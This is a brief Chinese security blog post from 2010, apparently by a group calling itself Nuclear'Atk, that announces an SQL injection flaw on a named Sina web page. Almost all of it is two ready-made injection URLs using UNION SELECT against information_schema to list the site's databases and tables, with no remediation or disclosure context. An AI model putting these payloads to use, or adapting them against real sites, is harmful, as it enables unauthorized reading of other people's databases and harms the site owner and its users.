【漏洞】新浪网最新注入漏洞 2010-08-05 老系统内容 漏洞 注入 约 16 字 预计阅读 1 分钟 文章目录 注入页面: http://php.baby.sina.com.cn/diary/list.php 爆数据库: http://php.baby.sina.com.cn/diary/list.php?netid=5167%20and%201=2%20union%20select%201,2,3,group_concat(schema_name),5,6,7,8,9%20from%20information_schema.schemata-- 爆表: http://php.baby.sina.com.cn/diary/list.php?netid=51675115%20and%201=2%20union%20select%201,2,group_concat(table_name),4,5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema=0x70 文章作者 Nuclear'Atk 上次更新 2010-08-05 许可协议 Nuclear'Atk(核攻击)网络安全实验室版权所有,转载请注明出处。